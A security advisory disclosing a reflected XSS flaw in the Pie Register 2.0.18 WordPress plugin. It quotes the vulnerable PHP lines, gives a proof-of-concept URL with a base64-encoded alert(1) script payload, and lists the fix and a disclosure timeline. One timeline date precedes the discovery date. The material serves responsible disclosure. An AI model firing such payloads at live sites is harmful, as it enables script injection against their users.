WordPress Pie Register 2.0.18 Cross Site Scripting

`  
Details  
================  
Software: Pie Register  
Version: 2.0.18  
Homepage: https://github.com/GTSolutions/Pie-Register  
CVE: CVE-2015-7377 (Pending)  
CVSS: 4.3 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:N)  
CWE: CWE-79  
  
Description  
================  
An unauthenticated reflected XSS vulnerability in Pie Register 2.0.18 allows malicious script injection via the invitaion_code parameter. Pie Register is a WordPress plugin with over 10,000 active installs.  
  
Vulnerability  
================  
The vulnerability is due to the unsanitized GET parameter invitaion_code:  
  
From: pie-register/pie-register.php:  
647: $inv_code = base64_decode($_GET['invitaion_code']);  
. . .  
662: <h2><?php _e("Activation Code","piereg");echo " : ".$inv_code; ?></h2>  
  
Proof of concept  
================  
The payload is Base64 encoded.  
  
http://localhost/wordpress/?page=pie-register&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==  
  
Tested on Firefox 41.0 and Chrome 45.0.2454.85.  
  
Remediation  
================  
Upgrade the plugin to version 2.0.19.  
  
Timeline  
================  
2015-09-23: Discovered  
2015-09-24: Contacted vendor via website support form  
2015-08-24: Requested CVE  
2015-09-28: Vendor supplied security contact email  
2015-09-30: Report sent to vendor and wordpress.org  
2015-10-02: Vendor releases version 2.0.19 on Github - confirmed fixed  
2015-10-12: Public Disclosure  
  
References  
================  
[1] http://codex.wordpress.org/Data_Validation  
  
Discovered by  
================  
David Moore @grajagandev  
`